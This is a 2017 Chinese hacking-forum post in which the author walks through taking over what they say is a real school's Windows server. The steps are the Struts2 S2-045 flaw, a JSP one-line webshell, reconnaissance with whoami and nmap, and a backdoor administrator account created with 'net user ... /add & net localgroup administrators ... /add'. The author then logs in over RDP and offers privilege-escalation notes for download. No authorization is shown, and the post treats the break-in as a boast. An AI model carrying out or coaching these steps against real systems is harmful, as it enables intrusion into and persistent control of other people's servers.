本帖最后由 小爱_Joker 于 2017-3-13 16:35 编辑
突然发现 = = 在i春秋群聊天 会有很多新手问你一些问题 当然 在帮他们解答的同时 你自己也会有很多文章的灵感吧 可以说是 因为 ...... 我也不知道怎么说 嘿嘿 进入正题
起因:秦国某小伙伴让我帮他提权下这个st2-045漏洞的服务器
QQ截图20170313213221.png (80.68 KB, 下载次数: 100)
2017-3-13 21:51 上传
接着上工具 一阵撸
QQ截图20170313215448.png (16.46 KB, 下载次数: 92)
2017-3-13 21:54 上传
[AppleScript] 纯文本查看 复制代码恭喜检测存在S2-045执行漏洞!
用户权限:nt authority\system
网站目录:D:\IMServer\apache-tomcat-7\webapps\embedded\\
这里可以直接执行cmd命令提权 但是我还是喜欢先拿个webshell 再装b提权
直接传大马的话他会报错
QQ截图20170313215728.png (34.26 KB, 下载次数: 102)
2017-3-13 21:59 上传
先传jsp一句话客户端连接
QQ截图20170313215925.png (15.87 KB, 下载次数: 95)
2017-3-13 21:59 上传
这里我不那么详细说了
上篇文章已经说过了
http://bbs.ichunqiu.com/thread-20224-1-1.html
如果还不懂的话请看视频教学。
Getshell成功 熟悉的大马界面
QQ截图20170313220456.png (93.85 KB, 下载次数: 131)
2017-3-13 22:05 上传
拿到webshell后 提权
这台服务器windows的 刚刚看了 执行几步曲就能轻松提权拿到服务器
[AppleScript] 纯文本查看 复制代码ver //查看版本
QQ截图20170313220652.png (14.49 KB, 下载次数: 95)
2017-3-13 22:07 上传
[AppleScript] 纯文本查看 复制代码whoami //查看权限
QQ截图20170313220701.png (15.57 KB, 下载次数: 96)
2017-3-13 22:07 上传
用nmap来扫描下开放端口信息
[AppleScript] 纯文本查看 复制代码nmap [url]www.xx.com[/url]
开放了3389
QQ截图20170313220910.png (21.94 KB, 下载次数: 131)
2017-3-13 22:09 上传
接着我们直接添加一个用户并且添加到管理员权限即可轻松拿到服务器
首先我们来查看下用户信息
net user //查看用户信息
这个test222是我刚刚添加的 ps:感觉这台服务器 万人骑- = 咳咳 自己实战了一次 才发文章= =
QQ截图20170313221013.png (17.82 KB, 下载次数: 106)
2017-3-13 22:10 上传
删除下这个用户
net user test222 /del
QQ截图20170313221103.png (2.95 KB, 下载次数: 109)
2017-3-13 22:11 上传
接着我们再来查看一下
我们会发现已经没有了test222用户
QQ截图20170313221126.png (18.26 KB, 下载次数: 117)
2017-3-13 22:11 上传
添加一个用户为xaisec 并且添加到管理员列表
net user xaisec xaisec /add & net localgroup administrators xaisec /add
以上命令 xaisec xaisec 是账号以及密码 net localgroup administrators xaisec /add 是吧用户xaisec 添加到管理员列表
QQ截图20170313221354.png (16.47 KB, 下载次数: 110)
2017-3-13 22:14 上传
继续查看下用户
QQ截图20170313221417.png (20.57 KB, 下载次数: 112)
2017-3-13 22:14 上传
QQ截图20170313221452.png (26.73 KB, 下载次数: 124)
2017-3-13 22:15 上传
成功连接 用户为xaisec 密码为xaisec
QQ截图20170313221952.png (20.12 KB, 下载次数: 113)
2017-3-13 22:20 上传
我日...这是什么。。
可怕了.........
QQ截图20170313222546.png (82.74 KB, 下载次数: 103)
2017-3-13 22:25 上传
QQ截图20170313222728.png (17.33 KB, 下载次数: 90)
2017-3-13 22:27 上传
我日 这内存= = 比我本机都好 我笔记本本机才4g mdzz!
QQ图片20170313223532.png (22.59 KB, 下载次数: 92)
2017-3-13 22:37 上传
QQ截图20170313222927.png (27.24 KB, 下载次数: 110)
2017-3-13 22:29 上传
我日 10T? 666666
QQ图片20170313230647.png (10.35 KB, 下载次数: 85)
2017-3-13 23:07 上传
本次只是记录下一次基础的提权过程 蛮顺利的 最后附赠提权笔记 贼全面。
提权笔记.txt
(24.7 KB, 下载次数: 113)
2017-3-13 22:34 上传
点击文件名下载附件
下载积分: 魔法币 -5
另外= = 这主站还是个学校站 收录也不低
QQ截图20170313234723.png (133.59 KB, 下载次数: 98)
2017-3-13 23:49 上传
目前我和空格表哥在帮他们维护 做点好事.
QQ图片20170313235021.jpg (22.31 KB, 下载次数: 96)
2017-3-13 23:50 上传